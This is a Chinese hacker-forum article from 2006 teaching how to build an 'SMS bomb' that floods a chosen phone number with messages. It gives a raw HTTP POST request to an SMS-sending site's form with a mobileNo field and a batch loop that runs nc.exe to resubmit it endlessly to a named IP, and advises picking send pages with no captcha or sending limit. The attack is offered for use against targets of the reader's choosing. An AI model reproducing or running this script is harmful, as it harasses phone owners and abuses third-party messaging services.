黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 正文
·完美空间提供500M免费AS04-10·企业安全之YY内网准入以04-09
·企业安全之意识与策略04-09·剑走偏锋:IIS漏洞利用04-09
·我来免费网提供100M免费04-09·1122mb.com提供20G超大免04-08
·映像劫持与反劫持技术04-07·让所有"暴力删除工具"无04-07
·入侵88red系统的详细过程04-07·Sql Injection脚本注入终04-07
·vbs+delphi 反弹后门生成04-07·飞讯网提供100MB免费PHP04-07
·突破SQL注入攻击时输入框04-04·结合内核和病毒技术的最04-04
·Real Player rmoc3260.d04-04·亿万网络今月最后为您提04-04
·php+mysql 5 sql inject04-03·Real Player rmoc3260.d04-03
·oblog文件下载漏洞04-03·免费啦提供1G-2G免费全能04-03
·完全解析网页后门和挂马04-02·一句话开3389(只测试过04-02
·萧萧免费空间网提供100M04-02·谷道免费空间网提供1G免04-01
·从本地入手解决双线路由03-31·sablog 1.6 多个跨站漏洞03-31
·富文本编辑器的跨站脚本03-31·Cookie注入是怎样产生的03-31
[组图]安静的小E也谈短信炸弹
      ★★★★★

安静的小E也谈短信炸弹

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-10-19 9:29:12
最近忙于工作,也断了2个月网络,哎@!~~~~
  本文已发表于黑客防线06年第10期,转载请注明出处!
                      ------------安静的小E
看过了06.08的“菜鸟也做短信炸弹”,觉得思路独到,原作者利用的是HTML构造表单,然后利用网站发信页面,实现无限循环提交。这样就弥补了网上一些“手机炸弹”类似程序的不足,一但发现网站发信页面失效了,可以直接修改链接,实现永不失效的效果。有些东西其实就是那么简单的原理,看你会不会去想了。
看过文章后,了解了简单的原理,忽然有一个想法,HTML构造表单能实现“信息炸弹”的效果,那么我用批处理写出来会不会达到同样的效果,经过测试,发现批处理也可以实现同样的效果。
随便找一个http://u.5ku.com,是个彩信、铃声下载站,并且在给手机发送信息的时候也无需验证码,(如图1)

就用这个吧!和原文同样的原理,用WSockExpert抓包分析数据,这里我就不罗嗦了,不会的看上期文章。
首先我们先新建一个1.txt文本文档,写入关键代码(这里我构造好了):
------------------------------------------------------------------------------------------------------------------------------------------
POST /register/reg02.aspx?Type=TX&Id=23441&a=200323&b=1&c=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.hl.chinamobile.com/hlPortalWebApp/com/hlcm2/clt/jpf/slfsvc/usrreg_15/ActS32601_1.do?mmstype=4&mmsid=35588&uid=16068&a=&b=&c=&d=&e=&f=&g=
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: u.5ku.com
Content-Length: 20
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=paml2n45eitn5qvd2uz5nkv5

mobileNo=13*********
------------------------------------------------------------------------------------------------------------------------------------------
需要解释的是:
http://www.hl.chinamobile.com/hlPortalWebApp/com/hlcm2/clt/jpf/slfsvc/usrreg_15/ActS32601_1.do?mmstype=4&mmsid=35588&uid=16068&a=&b=&c=&d=&e=&f=&g=这个是我修改的,为什么?这个地址比较权威,中国移动通信用户注册页面,大家可以随便自己修改,这个地址的页面(如图2)

,看到了吧!也没有验证码限制,并且速度爆快(大家在找页面的时候一定不要找有验证码的哦),还有在修改的时候要注意,有的彩信下载网站有次数限制,有一次我手机受到一个垃圾信息,就想玩他一下,后来我发现发了几条之后,就不能发送了,因为有发送次数限制的嘛,所以大家在使用的时候找一些无限制的网站页面。
mobileNo=13*********这个不用说了,写你要炸的手机号,其他信息都是抓包分析到的。
我们总要实现循环提交的吧,我们用NC(地球人都知道),然后再写一个批处理,方法如下:新建一个文本文档,然后写入:
------------------------------------------------------------------------------------------------------------------------------------------
:go
nc.exe -w 2 219.238.238.180 80<1.txt

goto go
------------------------------------------------------------------------------------------------------------------------------------------
NC的-w参数就是timeout的时间,219.238.238.180是彩信网站的IP,然后指向一下我们刚才建立的1.txt,最后保存为BAT批处理。现在一个批处理信息炸弹就完成了,(如图3)

然后我们如何使用呢?首先在1.txt里把mobileNo=13*********修改成你要炸的手机号,把NC打开,然后再打开手机炸弹.BAT(如图4)。

HOHO!然后最小化玩别的去吧!
本文到这里就结束了,就目前来说,这样的信息炸弹对用户来说还没有什么好的防范方法,大家一定要小心警惕,不要把自己的手机号随意透露!
文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    完全解析网页后门和挂马04-02
    真实的网络攻击取证纪实03-27
    利用404错误页面挂马03-21
    解密风暴03-21
    社会工程学在黑客中的应用01-02
    轻轻松松解密各种网页木马12-21
    SA权限无xp_cmdshell时取权限又一12-14
    实现无net.exe和net1.exe添加系统10-26
    用U盘轻松去除XP管理员密码10-26
    教你多种保护措施限用移动硬盘10-09
    bat 延时执行命令10-09
    phpwind的一个放后门的方式10-09
    相 关 文 章
    12元包300条,中国最省钱的短信套餐!
    下一站每天免费发10条短信
    百事可乐均免费提供每人15则免费祝福短
    中国移动飞信(短信免费发)
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886